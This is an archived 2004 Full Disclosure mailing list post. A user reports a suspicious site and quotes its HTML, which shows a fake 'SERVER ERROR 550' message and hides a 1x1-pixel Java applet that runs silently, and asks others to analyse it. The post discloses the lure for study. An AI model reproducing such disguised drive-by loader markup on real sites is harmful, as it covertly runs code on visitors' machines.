Full Disclosure mailing list archives

Previous By Date Next
Previous By Thread Next

[Full-Disclosure] Re: http://federalpolice.com:article872@1075686747

From: Nicola Fankhauser <nicola.fankhauser () variant ch>
Date: Sun, 15 Feb 2004 20:20:11 +0100
hi jedi

On Sun, 2004-02-15 at 18:45, Jedi/Sector One wrote: 

  This is equivalent to http://64.29.173.91/


ok, and the html of the index page is as following:

<html><body bgcolor=white link=#ffffff vlink=#ffffff alink=#ffffff>
<h2>SERVER ERROR 550</h2>
<applet ARCHIVE="javautil.zip" CODE="BlackBox.class" WIDTH=1 HEIGHT=1></applet></body></html>

now, the "SERVER ERROR 550" is clearly a fake - the java applet below
just starts fine. strangely, the 'javautil.zip' is not a valid zip-file,
yet 'appletviewer' and mozilla (don't know about MS IE; too dangerous :)
happily start the applet without any hickups or exceptions and mozilla
states 'Applet BlackBox started' in the status bar.

is there anybody knowledgable interested in un-zipping, de-compiling and
analysing this surely malicious applet? I would like to know what
mozilla just executed on my behalf there... :(

FYI, the file 'javautil.zip' attached is directly taken from the site
mentioned above.

regards
nicola

Attachment: javautil.zip
Description:

Previous By Date Next
Previous By Thread Next

Current thread: